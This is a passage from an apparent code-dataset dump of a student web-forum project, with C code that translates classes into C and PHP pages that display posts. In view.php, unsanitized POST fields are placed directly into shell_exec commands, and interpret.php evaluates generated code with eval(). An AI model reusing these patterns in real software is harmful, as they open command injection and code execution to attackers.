looking for classes */\n\tfor(i = 0; i < tokens->length; i++)\n\t{\n\t\tif(strcmp(tokens->contents[i], \"class\") == 0)\n\t\t{\n\t\t\tint j;\n\t\t\tfor(j = i + 1; j < tokens->length; j++)\n\t\t\t{\n\t\t\t\tif(isClass(tokens, j))\n\t\t\t\t{\n\t\t\t\t\tinClass = 1;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\t/* basically, if there is anything other than a space before our class declaration, we are NOT in a class */\n\t\t\t\telse if(!isspace(((char*)tokens->contents[j])[0]))\n\t\t\t\t{\n\t\t\t\t\tinClass = 0;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t/* if we are currently in a class, we need to record opening and closing brackets */\n\t\tif(inClass == 1)\n\t\t{\n\t\t\tif(strcmp(tokens->contents[i], \"{\") == 0)\n\t\t\t{\n\t\t\t\tif(foundBracket == 0)\n\t\t\t\t{\n\t\t\t\t\tfoundBracket = 1;\n\t\t\t\t}\n\t\t\t\tbracketCounter++;\n\t\t\t}\n\t\t\t/* encountered a closed bracket, may be an end-of-class */\n\t\t\telse if(strcmp(tokens->contents[i], \"}\") == 0)\n\t\t\t{\n\t\t\t\tbracketCounter --;\n\n\t\t\t\tif(foundBracket == 1 && bracketCounter == 0)\n\t\t\t\t{\n\t\t\t\t\tinClass = 0;\n\t\t\t\t\tfoundBracket = 0;\n\t\t\t\t}\n\t\t\t}\n\t\t\t/* we need to find the previous semicolon. 
*/\n\t\t\telse if(beginsFunction(tokens, i))\n\t\t\t{\n\t\t\t\tint bFuncCounter;\n\t\t\t\tint foundBFunc;\n\t\t\t\tint offset;\n\t\t\t\tint j;\n\n\t\t\t\tVector* fptrTokens;\n\n\t\t\t\t/* this will be inserted into the program */\n\t\t\t\tfptrTokens = makeVector(10);\n\n\t\t\t\tbFuncCounter = 0;\n\t\t\t\tfoundBFunc = 0;\n\n\t\t\t\t/* loop until we run out of space, or we find an open block brace */\n\t\t\t\tfor(j = i; j < tokens->length && strcmp(tokens->contents[j], \"{\") != 0; j++)\n\t\t\t\t{\n\t\t\t\t\tif(isFunction(tokens, j))\n\t\t\t\t\t{\n\t\t\t\t\t\tappendString(fptrTokens, \"(*\", 3);\n\t\t\t\t\t}\n\t\t\t\t\tappendString(fptrTokens, (char*)tokens->contents[j], strlen((char*) tokens->contents[j]));\n\t\t\t\t\tif(isFunction(tokens, j))\n\t\t\t\t\t{\n\t\t\t\t\t\tappendString(fptrTokens, \")\", 2);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tappendString(fptrTokens, \";\\n\", 3);\n\n\t\t\t\t/* loops through the positions. */\n\t\t\t\tdo\n\t\t\t\t{\n\t\t\t\t\tif(strcmp(tokens->contents[i], \"{\") == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tfoundBFunc = 1;\n\t\t\t\t\t\tbFuncCounter ++;\n\t\t\t\t\t}\n\t\t\t\t\telse if(strcmp(tokens->contents[i], \"}\") == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tbFuncCounter --;\n\t\t\t\t\t\tif(foundBFunc == 1 && bFuncCounter == 0)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tappend(allFunctionTokens, removeAt(tokens, i));\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tappend(allFunctionTokens, removeAt(tokens, i));\n\n\t\t\t\t}while(bFuncCounter != 0 || foundBFunc == 0);\n\t\t\t\tappendString(allFunctionTokens, \"\\n\", 2);\n\n\t\t\t\toffset = fptrTokens->length;\n\n\t\t\t\t/* inserts the new function Pointer tokens into their proper location */\n\t\t\t\t/*\n\t\t\t\tfor(j = fptrTokens->length - 1; j >= 0; j--)\n\t\t\t\t{\n\t\t\t\t\tinsert(tokens, removeAt(fptrTokens, j), i);\n\t\t\t\t}\n\t\t\t\t*/\n\t\t\t\twhile(fptrTokens->length > 0)\n\t\t\t\t{\n\t\t\t\t\tif(fptrTokens->contents[fptrTokens->length - 1] != NULL)\n\t\t\t\t\t{\n\t\t\t\t\t\tinsert(tokens, 
removeAt(fptrTokens, fptrTokens->length - 1), i);\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tdestroyVector(fptrTokens);\n\t\t\t\tfptrTokens = NULL;\n\n\t\t\t\ti += offset - 1;\n\t\t\t}\n\t\t}\n\t}\n\n\tfor(i = 0; i < tokens->length; i ++)\n\t{\n\t\t/* if we have found main */\n\t\tif(isFunction(tokens, i) && strcmp(tokens->contents[i], \"main\") == 0)\n\t\t{\n\t\t\tint j;\n\t\t\t/* loop until we find \"int\", as this would be the starting function declaration */\n\t\t\tfor(j = i - 1; j >= 0; j--)\n\t\t\t{\n\t\t\t\tif(beginsFunction(tokens, j))\n\t\t\t\t{\n\t\t\t\t\tinsertPos = j;\n\t\t\t\t\tbreak;\n\t\t\t\t}\t\n\t\t\t}\n\t\t\t/* backtrack then insert functions above main */\n\t\t\tif(insertPos != 0)\n\t\t\t{\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t}\t\n\tappendString(allFunctionTokens, \"\\n\", 2);\n\t/* inserts the final tokens into the vector. */\n\tfor(i = allFunctionTokens->length - 1; i >= 0; i--)\n\t{\n\t\tinsert(tokens, removeAt(allFunctionTokens, i), insertPos);\n\t}\n\tdestroyVector(allFunctionTokens);\n\n\treturn;\n}\n\nint createAllConstructors(Vector* tokens)\n{\n\tint i;\n\n\tfor(i = 0; i < tokens->length; i++)\n\t{\n\t\tchar* classConstructor;\n\t\tif(isClass(tokens, i))\n\t\t{\n\t\t\tint insertPos;\n\t\t\tint j;\n\t\t\tclassConstructor = makeConstructor(tokens, i);\n\n\t\t\tinsertPos = -1;\n\n\t\t\t/* loop to find main */\n\t\t\tfor(j = i; j < tokens->length; j++)\n\t\t\t{\n\t\t\t\tif(beginsFunction(tokens, j))\n\t\t\t\t{\n\t\t\t\t\tint k;\n\t\t\t\t\t/* loop to find if the function we just found IS main... 
*/\n\t\t\t\t\tfor(k = j; k < tokens->length; k++)\n\t\t\t\t\t{\n\t\t\t\t\t\tif(isFunction(tokens, k))\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tif(strcmp(tokens->contents[k], \"main\") == 0)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tinsertPos = j;\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\telse\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tif(insertPos != -1)\n\t\t\t\t{\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tinsert(tokens, classConstructor, insertPos);\n\t\t}\n\t}\n\n\treturn 0;\n}\n\nchar* makeConstructor(Vector* tokens, int pos)\n{\n\tint i;\n\tint foundBracket;\n\tint bracketCounter;\n\tchar* constructor;\n\n\tfoundBracket = 0;\n\tbracketCounter = 0;\n\n\tconstructor = malloc(sizeof(char)*1024);\n\tif(constructor == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\n\tconstructor[0] = '\\0';\n\n\tstrcat(constructor, \"void construct\");\n\tstrcat(constructor, tokens->contents[pos]);\n\tstrcat(constructor, \"(struct \");\n\tstrcat(constructor, tokens->contents[pos]);\n\tstrcat(constructor, \"* this)\\n{\\n\");\n\n\t/* loop through the class, grabbing the function pointers */\n\tfor(i = pos; i < tokens->length; i++)\n\t{\n\t\tif(strcmp(tokens->contents[i], \"{\") == 0)\n\t\t{\n\t\t\tfoundBracket = 1;\n\t\t\tbracketCounter ++;\n\t\t}\n\t\telse if(strcmp(tokens->contents[i], \"}\") == 0)\n\t\t{\n\t\t\tbracketCounter --;\n\n\t\t\t/* we have broken out of a class */\n\t\t\tif(bracketCounter == 0 && foundBracket == 1)\n\t\t\t{\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\telse if(isVariable(tokens, i))\n\t\t{\n\t\t\tint j;\n\t\t\tint addInit;\n\t\t\tchar varInit[512];\n\n\t\t\tvarInit[0] = '\\0';\n\t\t\tstrcpy(varInit, \"\\tthis->\");\n\t\t\taddInit = 0;\n\n\t\t\tfor(j = i; j < tokens->length && strcmp(tokens->contents[j], \";\") != 0; j++)\n\t\t\t{\n\t\t\t\tstrcat(varInit, tokens->contents[j]);\n\t\t\t}\n\n\t\t\tstrcat(varInit, \";\\n\");\n\t\t\t\n\t\t\tfor(j = 0; j < strlen(varInit); j++)\n\t\t\t{\n\t\t\t\tif(varInit[j] == 
'=')\n\t\t\t\t{\n\t\t\t\t\taddInit = 1;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif(addInit == 1)\n\t\t\t{\n\t\t\t\tj = i + 1;\n\t\t\t\twhile(strcmp((char*)tokens->contents[j], \";\") != 0)\n\t\t\t\t{\n\t\t\t\t\tfree(removeAt(tokens, j));\n\t\t\t\t}\n\t\t\t\tstrcat(constructor, varInit);\n\t\t\t}\n\t\t}\n\t\telse if(isFunctionPointer(tokens, i))\n\t\t{\n\t\t\t/* if we have found a function pointer, add it to the constructor */\n\t\t\tstrcat(constructor, \"\\tthis->\");\n\t\t\tstrcat(constructor, (char*) tokens->contents[i]);\n\t\t\tstrcat(constructor, \" = &\");\n\t\t\tstrcat(constructor, (char*) tokens->contents[i]);\n\t\t\tstrcat(constructor, \";\\n\");\n\t\t}\n\t}\n\n\tstrcat(constructor, \"}\\n\");\n\n\treturn constructor;\n}\n\nint placeConstructors(Vector* tokens)\n{\n\tint i;\n\tint inClass;\n\tint bracketCounter;\n\n\tinClass = 0;\n\tbracketCounter = 0;\n\n\tfor(i = 0; i < tokens->length; i++)\n\t{\n\t\tif(isClass(tokens, i))\n\t\t{\n\t\t\tinClass = 1;\n\t\t}\n\t\telse if(strcmp(tokens->contents[i], \"{\") == 0)\n\t\t{\n\t\t\tbracketCounter ++;\n\t\t}\n\t\telse if(strcmp(tokens->contents[i], \"}\") == 0)\n\t\t{\n\t\t\tbracketCounter --;\n\t\t\tif(bracketCounter == 0)\n\t\t\t{\n\t\t\t\tinClass = 0;\n\t\t\t}\n\t\t}\n\n\t\t/* this will capture only non-member functions */\n\t\tif(isFunction(tokens, i) && inClass == 0)\n\t\t{\n\t\t\tint j;\n\t\t\tint bracketLevel;\n\n\t\t\tbracketLevel = 0;\n\n\t\t\tfor(j = i + 1; j < tokens->length; j++)\n\t\t\t{\n\t\t\t\tif(strcmp(tokens->contents[j], \"{\") == 0)\n\t\t\t\t{\n\t\t\t\t\tbracketLevel ++;\n\t\t\t\t}\n\t\t\t\telse if(strcmp(tokens->contents[j], \"}\") == 0)\n\t\t\t\t{\n\t\t\t\t\tbracketLevel --;\n\t\t\t\t\tif(bracketLevel == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tbreak;\t\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\telse if(isClassVariable(tokens, j))\n\t\t\t\t{\n\t\t\t\t\tint k;\n\t\t\t\t\tchar* varType;\n\t\t\t\t\tchar* constructorCall;\n\n\t\t\t\t\tvarType = getType(tokens, j);\n\t\t\t\t\tconstructorCall = malloc(sizeof(char) 
* 512);\n\n\t\t\t\t\tstrcpy(constructorCall, \"\\nconstruct\");\n\t\t\t\t\tstrcat(constructorCall, varType);\n\t\t\t\t\tstrcat(constructorCall, \"(&\");\n\t\t\t\t\tstrcat(constructorCall, tokens->contents[j]);\n\t\t\t\t\tstrcat(constructorCall, \");\\n\");\n\n\t\t\t\t\t/* find a semicolon. */\n\t\t\t\t\tfor(k = j + 1; k < tokens->length; k++)\n\t\t\t\t\t{\n\t\t\t\t\t\tif(strcmp(tokens->contents[k], \";\") == 0)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tinsert(tokens, constructorCall, k + 1);\n\n\t\t\t\t\tfree(varType);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn 0;\n}\n\nint fixOuterFunctions(Vector* tokens)\n{\n\tint i;\n\tint inClass;\n\tint bracketCounter;\n\tint inOuterFunc;\n\n\tinClass = 0;\n\tbracketCounter = 0;\n\tinOuterFunc = 0;\n\n\t/* loop, looking for outer classes. */\n\tfor(i = 0; i < tokens->length; i++)\n\t{\n\t\tif(isClass(tokens, i))\n\t\t{\n\t\t\tinClass = 1;\t\n\t\t}\n\t\telse if(strcmp(tokens->contents[i], \"{\") == 0)\n\t\t{\n\t\t\tbracketCounter ++;\n\t\t}\n\t\telse if(strcmp(tokens->contents[i], \"}\") == 0)\n\t\t{\n\t\t\tbracketCounter --;\n\t\t\tif(bracketCounter == 0)\n\t\t\t{\n\t\t\t\tinClass = 0;\t\n\t\t\t\tinOuterFunc = 0;\n\t\t\t}\n\t\t}\n\t\t/* if we are not in a class, we need to check if it is a function */\n\t\telse if(inClass == 0 && isFunction(tokens, i))\n\t\t{\n\t\t\tinOuterFunc = 1;\n\t\t}\n\t\telse if(inOuterFunc == 1 && isValidName((char*)tokens->contents[i]) && isMemberFunctionCall(tokens, i))\n\t\t{\n\t\t\tmodifyFunctionCall(tokens, i);\n\t\t}\n\t}\n\n\treturn 0;\n}\n\nint modifyFunctionCall(Vector* tokens, int pos)\n{\n\tint i;\n\tint j;\n\tchar* className;\n\tchar* extraParam;\n\tchar* args;\n\tchar* newFName;\n\tchar* comma;\n\n\textraParam = malloc(sizeof(char) * 256);\n\targs = malloc(sizeof(char) * 512);\n\tcomma = malloc(sizeof(char) * 2);\n\n\targs[0] = '\\0';\n\tcomma[0] = '\\0';\n\tcomma[1] = '\\0';\n\n\tj = pos+2;\n\n\t/* creates the &className that will be added to the 
parameters */\n\tstrcpy(extraParam, \"&\");\n\tstrcpy(comma, \",\");\n\n\t/* gets the name of the class */\n\tfor(i = pos - 1; i >= 0; i--)\n\t{\n\t\tif(isValidName(tokens->contents[i]))\n\t\t{\n\t\t\t/* grabs the class variable name */\n\t\t\tstrcat(extraParam, tokens->contents[i]);\n\t\t\tclassName = getType(tokens, i);\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]) && strcmp(tokens->contents[i], \".\") != 0)\n\t\t{\n\t\t\treturn -1;\n\t\t}\n\t}\n\n\twhile(strcmp(tokens->contents[j], \")\") != 0)\n\t{\n\t\tif(j >= tokens->length)\n\t\t{\n\t\t\treturn -1;\n\t\t}\n\t\t/* we don't want to include the opening bracket... */\n\t\tif(strcmp(tokens->contents[j], \"(\") != 0)\n\t\t{\n\t\t\t/* this adds on another part of the parameters, and then a space to delimit them. */\n\t\t\tif(isValidName(tokens->contents[j]))\n\t\t\t{\n\t\t\t\tchar* paramType;\n\t\t\t\tparamType = getType(tokens, j);\n\t\t\t\tif(isValidName(paramType))\n\t\t\t\t{\n\t\t\t\t\tstrcat(args, \"struct\");\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tstrcat(args, paramType);\n\t\t\t\t}\n\t\t\t\tfree(paramType);\n\t\t\t}\n\t\t\tstrcat(args, \",\");\n\t\t}\n\t\tj++;\n\t}\n\tnewFName = mangle(className, tokens->contents[pos], args);\n\n\tfree(tokens->contents[pos]);\n\ttokens->contents[pos] = newFName;\n\n\tinsert(tokens, extraParam, j);\n\tfor(i = j - 1; i > pos; i--)\n\t{\n\t\tif(strcmp(tokens->contents[i], \"(\") == 0)\n\t\t{\n\t\t\tfree(comma);\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*) tokens->contents[i])[0]))\n\t\t{\n\t\t\tinsert(tokens, comma, j);\n\t\t\tbreak;\t\n\t\t}\n\t}\n\tfree(className);\n\tfree(args);\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.46296295523643494, "alphanum_fraction": 0.49176955223083496, "avg_line_length": 12.885714530944824, "blob_id": "9fe0b751d07c075d661d069b522604b57f77104e", "content_id": "f06debf4444bff19cf89e5dc6821bf847d4069f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", 
"length_bytes": 486, "license_type": "no_license", "max_line_length": 85, "num_lines": 35, "path": "/interpret.php", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "<?php\n\n$inphp = 0;\n$script = \"\";\nforeach($output as $line)\n{\n\tif(substr($line, 0, 5) === \"<?php\" and substr($line, strlen($line) - 2, 2) === \"?>\")\n\t{\n\t\teval(substr($line, 5, strlen($line) - 7));\n\t\tcontinue;\n\t}\n\telseif(substr($line, 0, 5) === \"<?php\")\n\t{\n\t\t$inphp = 1;\n\t\tcontinue;\n\t}\n\telseif(substr($line, strlen($line) - 2, 2) === \"?>\")\n\t{\n\t\teval($script);\n\t\t$script = \"\";\n\t\t$inphp = 0;\t\n\t\tcontinue;\n\t}\n\n\tif($inphp == 0)\n\t{\n\t\techo $line;\n\t}\n\telse\n\t{\n\t\t$script = $script.$line;\n\t}\n}\n\n?>\n" }, { "alpha_fraction": 0.5335586667060852, "alphanum_fraction": 0.5393529534339905, "avg_line_length": 17.008695602416992, "blob_id": "5e557d9b73cd2ea4d2352828e49b36ca21a01c05", "content_id": "806cc9b9832d090240db6d3ab32d4ae7ffe5a2e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 2071, "license_type": "no_license", "max_line_length": 114, "num_lines": 115, "path": "/view.php", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "<html>\n\n<head>\n\t<title>Viewing Streams</title>\n\t<link href=\"style.css\" type=\"text/css\" rel=\"stylesheet\">\n</head>\n\n<body>\n\n<?php\n\n/* recalculate $length every time. */\n$length = shell_exec(\"./view.py \\\"\".$_POST[\"username\"].\"\\\" \".$_POST[\"stream\"].\" 0 pdate len\");\n\n$index = '0';\n$order= 'pdate';\n$command = 'view';\n\n/* this would occur if we just got into the page. 
*/\nif(!isset($_POST[\"index\"]))\n{\n\tif($_POST[\"stream\"] === \"all\")\n\t{\n\t\t$index = 0;\n\t}\n\telse\n\t{\n\t\t$eres = shell_exec(\"./view.py \\\"\".$_POST[\"username\"].\"\\\" \".$_POST[\"stream\"].\" 0 pdate last\");\n\n\t\t$index = $eres;\n\t}\n}\nelse\n{\n\t$index = $_POST[\"index\"];\n}\n\n\nif(!isset($_POST[\"order\"]))\n{\n\t$order = \"pdate\";\n}\nelse\n{\n\t$order = $_POST[\"order\"];\n}\n\n/* this reacts to the user inputs. */\nif(isset($_POST[\"userin\"]))\n{\n\t$command = $_POST[\"userin\"];\n\n\tif($command == \"next\")\n\t{\n\t\t$index = intval($_POST[\"index\"]) + 1;\n\t\tif($index >= $length)\n\t\t{\n\t\t\t$index = $length - 1;\n\t\t}\n\t}\n\telseif($command == \"prev\")\n\t{\n\t\t$index = intval($_POST[\"index\"]) - 1;\n\t\tif($index < 0)\n\t\t{\n\t\t\t$index = 0;\n\t\t}\n\t}\n\telse\n\t{\n\t\t$index = $_POST[\"index\"];\n\t}\n\n\tif($command == \"mark\")\n\t{\n\t\t$res = shell_exec(\"./view.py \\\"\".$_POST[\"username\"].\"\\\" \\\"\".$_POST[\"stream\"].\"\\\" \\\"\".$_POST[\"order\"].\"\\\" mark\");\n\t}\n\n\telseif($command == \"order\")\n\t{\n\t\tif($order === 'pdate')\n\t\t{\n\t\t\t$order = 'username';\n\t\t}\n\t\telseif($order === 'username')\n\t\t{\n\t\t\t$order = 'pdate';\n\t\t}\n\t\t$index = 0;\n\t}\n}\n\n$username = $_POST[\"username\"];\n$stream = $_POST[\"stream\"];\n\n$cmd = \"./view.py '$username' '$stream' '$index' '$order' 'view'\";\n$post = shell_exec($cmd);#\"./view.py julian bunnies 0 date view\");\n\nstr_replace(\"\\n\", \"<br>\", $post);\n$post = nl2br($post);\n\nexec(\"./create view.wpml\", $output, $result);\ninclude \"interpret.php\";\n\necho \"<input type=\\\"hidden\\\" form=\\\"command\\\" name=\\\"index\\\" value=\\\"$index\\\">\";\necho \"<input type=\\\"hidden\\\" form=\\\"switch\\\" name=\\\"index\\\" value=\\\"$index\\\">\";\n\necho \"<input type=\\\"hidden\\\" form=\\\"command\\\" name=\\\"order\\\" value=\\\"$order\\\">\";\necho \"<input type=\\\"hidden\\\" form=\\\"switch\\\" name=\\\"order\\\" 
value=\\\"$order\\\">\";\n\n?>\n\n</body>\n\n</html>\n" }, { "alpha_fraction": 0.5427196025848389, "alphanum_fraction": 0.5562575459480286, "avg_line_length": 15.057971000671387, "blob_id": "41a848613b3b392f6287f586a3b4357f02bc7ec2", "content_id": "73776100615eb8afb163b7b47b02245fc36fd592", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 6648, "license_type": "no_license", "max_line_length": 89, "num_lines": 414, "path": "/generation.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n * \tthis file contains source for an html generator. \n */\n#include \"generation.h\"\n#include \"tags.h\"\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\n\nvoid generatePage(char* fname)\n{\n\tchar line[2048];\n\tFILE* inFile;\n\n\tinFile = fopen(fname, \"r\");\n\tif(inFile == NULL)\n\t{\n\t\treturn;\n\t}\n\n\n\twhile(fgets(line, 2048, inFile) != NULL)\n\t{\n\t\tint i;\n\t\tchar** tags;\n\n\t\ti = 0;\n\n\t\t/* gets the tags on the line, separated by .s */\n\t\ttags = splitTagLine(line);\n\t\tif(tags != NULL)\n\t\t{\n\t\t\twhile(tags[i] != NULL)\n\t\t\t{\n\t\t\t\tchar* markup;\n\n\t\t\t\tmarkup = generateTag(tags[i]);\n\t\t\t\tputs(markup);\n\t\t\t\tputs(\"\");\n\n\t\t\t\tfree(tags[i]);\n\t\t\t\tfree(markup);\n\t\t\t\ti++;\n\t\t\t}\n\t\t\tfree(tags);\n\t\t}\n\n\t\t/* puts a break after a line of the config. 
*/\n\t\tputs(LINE_BREAK);\n\t}\n\n\tfclose(inFile);\n\n\treturn;\n}\n\nchar* generateTag(char* configTag)\n{\n\tchar* markup;\n\n\tswitch(configTag[1])\n\t{\n\t\tcase('d'):\n\t\t\tmarkup = malloc(sizeof(char) * 5);\n\t\t\tstrcpy(markup, \"<hr>\");\n\t\t\tbreak;\n\t\tcase('t'):\n\t\t\tmarkup = createText(configTag);\n\t\t\tbreak;\n\t\tcase('h'):\n\t\t\tmarkup = createHeader(configTag);\n\t\t\tbreak;\n\t\tcase('l'):\n\t\t\tmarkup = createLink(configTag);\n\t\t\tbreak;\n\t\tcase('b'):\n\t\t\tmarkup = createButton(configTag);\n\t\t\tbreak;\n\t\tcase('i'):\n\t\t\tmarkup = createInput(configTag);\n\t\t\tbreak;\n\t\tcase('p'):\n\t\t\tmarkup = createPicture(configTag);\n\t\t\tbreak;\n\t\tcase('r'):\n\t\t\tmarkup = createRadio(configTag);\n\t\t\tbreak;\n\t\tcase('e'):\n\t\t\tmarkup = createExec(configTag);\n\t\t\tbreak;\n\t\tcase('f'): /* stands for 'format' */\n\t\t\tmarkup = createDiv(configTag);\n\t\t\tbreak;\n\t\tcase('g'):\n\t\t\tmarkup = malloc(sizeof(char) * (strlen(\"</div>\") + 1));\n\t\t\tstrcpy(markup, \"</div>\");\n\t\t\tbreak;\n\t\tcase('z'):\n\t\t\tmarkup = createDependency(configTag);\n\t\t\tbreak;\n\t\tcase('a'):\n\t\t\tmarkup = createAdd(configTag);\n\t\t\tbreak;\n\t\tcase('v'):\n\t\t\tmarkup = createView(configTag);\n\t\t\tbreak;\n\t\tcase('w'):\n\t\t\tmarkup = createPost(configTag);\n\t\t\tbreak;\n\t\tcase('s'):\n\t\t\tmarkup = createSelector(configTag);\n\t\t\tbreak;\n\t}\n\n\treturn markup;\n}\n\nchar* getValue(char* attribute)\n{\n\tint i;\n\tint startVal;\n\tint endVal;\n\tint cpos;\n\n\tchar* value;\n\n\t/* collect the starting position for the tag's value. */\n\tfor(i = 0; i < strlen(attribute); i++)\n\t{\n\t\tif(attribute[i] == '=')\n\t\t{\n\t\t\t/* this means we have a \" delimiting the attribute value. 
*/\n\t\t\tif(i + 1 < strlen(attribute) && attribute[i + 1] == '\\\"')\n\t\t\t{\n\t\t\t\tstartVal = i + 2;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tstartVal = i + 1;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t}\n\n\t/* if this value ends with a quote, we need to avoid storing it. */\n\tif(attribute[strlen(attribute) - 1] == '\\\"')\n\t{\n\t\tendVal = strlen(attribute) - 2;\n\t}\n\telse\n\t{\n\t\tendVal = strlen(attribute) - 1;\n\t}\n\n\tvalue = malloc(sizeof(char) * (endVal - startVal + 2));\n\tif(value == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\n\t/* set the writing position to 0. */\n\tcpos = 0;\n\n\t/* collect all value characters. */\n\tfor(i = startVal; i <= endVal; i++)\n\t{\n\t\tvalue[cpos] = attribute[i];\n\t\tcpos ++;\n\t}\n\n\t/* store the null terminator. */\n\tvalue[cpos] = '\\0';\n\n\treturn value;\n}\n\n\nchar** splitTagLine(char* tagLine)\n{\n\tint i;\n\tint j;\n\tint numTags;\n\tint inString;\n\n\tchar** tags;\n\n\tnumTags = 0;\n\tinString = 0;\n\n\t/* collect number of periods, this, when incrimented, is the number of arguments. */\n\tfor(i = 0; i < strlen(tagLine); i++)\n\t{\n\t\t/* capture periods. */\n\t\tif(tagLine[i] == '.')\n\t\t{\n\t\t\tif(inString == 0)\n\t\t\t{\n\t\t\t\tnumTags ++;\n\t\t\t}\n\t\t}\n\t\telse if(tagLine[i] == '\\\"')\n\t\t{\n\t\t\tif(inString == 1)\n\t\t\t{\n\t\t\t\tinString = 0;\n\t\t\t}\n\t\t\telse if(inString == 0)\n\t\t\t{\n\t\t\t\tinString = 1;\n\t\t\t}\n\t\t}\n\t}\n\n\ttags = malloc(sizeof(char*) * (numTags + 1));\n\tif(tags == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\n\t/* reset the string flag */\n\tinString = 0;\n\n\tj = 1;\n\tfor(i = 0; i < numTags; i++)\n\t{\n\t\tint charsWritten;\n\t\tchar tagBuffer[2048];\n\n\t\t/* pre-adds a period. */\n\t\ttagBuffer[0] = '.';\n\n\t\tcharsWritten = 1;\n\n\t\twhile((tagLine[j] != '.' && tagLine[j] != '\\n') || inString == 1)\n\t\t{\n\t\t\ttagBuffer[charsWritten] = tagLine[j];\n\n\t\t\t/* set the inString variable. 
*/\n\t\t\tif(tagLine[j] == '\\\"')\n\t\t\t{\n\t\t\t\tif(inString == 1)\n\t\t\t\t{\n\t\t\t\t\tinString = 0;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tinString = 1;\n\t\t\t\t}\n\t\t\t}\n\t\t\tcharsWritten++;\n\t\t\tj++;\n\t\t}\n\n\t\ttags[i] = malloc(sizeof(char) * (charsWritten + 1));\n\t\tif(tags[i] == NULL)\n\t\t{\n\t\t\tint k;\n\t\t\tfor(k = i; k >= 0; k--)\n\t\t\t{\n\t\t\t\tfree(tags[k]);\n\t\t\t}\n\t\t\tfree(tags);\n\n\t\t\treturn NULL;\n\t\t}\n\n\t\ttagBuffer[charsWritten] = '\\0';\n\t\tstrcpy(tags[i], tagBuffer);\n\n\t\t/* if we reached the end of the string */\n\t\tif(tagLine[j] == '\\n')\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\telse if(tagLine[j] == '.')\n\t\t{\n\t\t\tj++;\n\t\t}\n\t}\n\n\ttags[numTags] = NULL;\n\treturn tags;\n}\n\nchar** getArgs(char* wholeTag)\n{\n\tint i;\n\tint j;\n\tint startBracket;\n\tint endBracket;\n\tint numArgs;\n\tint inString;\n\n\tchar** args;\n\n\tnumArgs = 1;\n\tinString = 0;\n\n\tstartBracket = 2;\n\tendBracket = strlen(wholeTag) - 1;\n\n\t/* TODO add support for in-string commas and brackets */\n\n\t/* if there is more than *nothing* between the two brackets */\n\tif(endBracket - startBracket > 1)\n\t{\n\t\tinString = 0;\n\t\t/* count the number of brackets present in the file; each one denote a new argument. */\n\t\tfor(i = startBracket; i <= endBracket; i++)\n\t\t{\n\t\t\tif(wholeTag[i] == ',')\n\t\t\t{\n\t\t\t\tif(inString == 0)\n\t\t\t\t{\n\t\t\t\t\tnumArgs ++;\n\t\t\t\t}\n\t\t\t}\n\t\t\telse if(wholeTag[i] == '\"')\n\t\t\t{\n\t\t\t\tif(inString == 1)\n\t\t\t\t{\n\t\t\t\t\tinString = 0;\n\t\t\t\t}\n\t\t\t\telse if(inString == 0)\n\t\t\t\t{\n\t\t\t\t\tinString = 1;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\t/* return NULL, there are no arguments. */\n\telse\n\t{\n\t\treturn NULL;\n\t}\n\n\targs = malloc(sizeof(char*) * (numArgs + 1));\n\tif(args == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\n\tj = startBracket + 1;\n\tinString = 0;\n\t/* loop through the args, but not the last one. 
